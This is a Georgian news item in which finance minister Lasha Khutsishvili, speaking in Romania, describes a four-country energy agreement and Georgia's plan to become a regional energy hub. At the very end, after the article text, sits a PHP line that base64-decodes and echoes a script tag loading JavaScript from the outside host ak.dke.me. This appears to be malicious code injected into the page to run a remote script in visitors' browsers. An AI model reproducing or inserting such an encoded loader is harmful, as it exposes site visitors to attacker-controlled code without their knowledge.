celsiusi
ავერსი საქკაბელი
ნამდვილად ისტორიული დღეა, იქიდან გამომდინარე, რომ ხელშეკრულება, რომელსაც ხელი მოაწერა ოთხმა ქვეყანამ, ეს არის ძალიან დიდი შესაძლებლობა, საქართველოსთვის, რეგიონისთვის და მათ შორის ევროკავშირისთვის, რათა უზრუნველყოფილი იქნას ამ ქვეყნების ენერგოდამოუკიდებლობა და მნიშვნელოვანი წვლილი შეიტანოს რეგიონში ეკონომიკური განვითარების მიმართულებით, – ამის შესახებ ფინანსთა მინისტრმა, ლაშა ხუციშვილმა რუმინეთში განაცხადა, სადაც პრემიერ-მინისტრის დელეგაციის შემადგენლობაში იმყოფება.
მისივე თქმით, საქართველო გახდება არა მხოლოდ ეკონომიკური, არამედ ენერგეტიკული ჰაბიც რეგიონისთვის და ძალიან მნიშვნელოვანი კონტრიბუციის შემტანი ევროკავშირის ენერგოუსაფრთხოების საკითხში.
„აღნიშნული პროექტის ინიციატორი არის სახელმწიფო, ჯერ კიდევ ორი წლის წინ დაიწყო საქართველოს მთავრობამ ამ პროექტზე მუშაობა, ჩვენ უკვე დაფინანსებული გვაქვს წინასწარი ე.წ. Feasibility Study,  წინასწარი შესწავლა პროექტისა, რომლის საწყის ეტაპზე წინასწარმა მონაცემებმა აჩვენა, რომ პროექტი ძალიან წარმატებული შეიძლება იყოს ეკონომიკური და ფინანსური თვალსაზრისით. ამ მიმართულებით ინვესტიციებს უკვე ვახორციელებთ. გარდა აღნიშნული სამუშაოებისა, ჩვენ ფაქტობრივად შეთანხმებულები ვართ უკვე, რომ გეოლოგიურ კვლევებს, რომელიც შავ ზღვაში უნდა ჩატარდეს საქართველო დააფინანსებს 20 მლნ აშშ დოლარის ოდენობით და პარალელურად ვფიქრობთ, როდესაც დასრულდება საბოლოო ვერსია გაანგარიშების და შესწავლის პროცესის, უახლოეს პერიოდში დაიწყება მისი იმპლემენტაცია. ამ კუთხით შეგვიძლია, თამამად ვთქვათ, რომ საქართველო იქნება არა მხოლოდ ეკონომიკური, არამედ ენერგეტიკული ჰაბიც რეგიონისთვის და ძალიან მნიშვნელოვანი კონტრიბუტორი, კონტრიბუციის შემტანი ევროკავშირის ენერგოუსაფრთხოების საკითხში“, – განაცხადა ფინანსთა მინისტრმა.
258
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");